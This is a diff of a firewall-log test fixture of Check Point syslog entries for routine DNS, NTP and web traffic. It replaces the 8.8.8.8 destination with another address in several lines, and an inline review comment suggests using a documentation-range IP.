-<134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501226"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60859"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501226"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60859"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35319"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"174.138.9.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36152"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:00:27Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36451"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
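Review bot: The replacement destination `dst:"175.16.199.1"` on the added line is an allocated, routable public address rather than one of the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so the fixture still names a real-world host, just a different one than 8.8.8.8. If the goal is only to keep a well-known public resolver out of test data, a TEST-NET address such as `dst:"192.0.2.1"` would make that intent self-evident to the next maintainer. If instead the fixture depends on this address resolving in a bundled GeoIP test database (nothing in the diff shows this either way), it would be worth recording that in the module's test README or next to the expected-output file so the value is not "corrected" later. The same substitution is repeated in the later hunks of this file.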
@@ -1923,7 +1923,7 @@
 <134>1 2020-03-29T17:01:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d481,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50087"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:01:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d481,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50088"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:01:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d482,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:02:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d499,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:02:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d499,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:02:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d49f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62674"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d49f,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60684"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10232"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:02:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d49f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62267"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -2010,7 +2010,7 @@
 <134>1 2020-03-29T17:02:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4ba,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35440"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10244"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:02:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4ba,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44721"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4ba,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54724"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10245"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40180"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43505"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44654"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34422"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26825"; xlatesrc:"0.0.0.0"]
@@ -2097,9 +2097,9 @@
 <134>1 2020-03-29T17:03:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4e0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50093"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:03:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4e1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50094"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:03:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4e1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50095"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"13.224.227.39"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58636"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501424"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501424"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
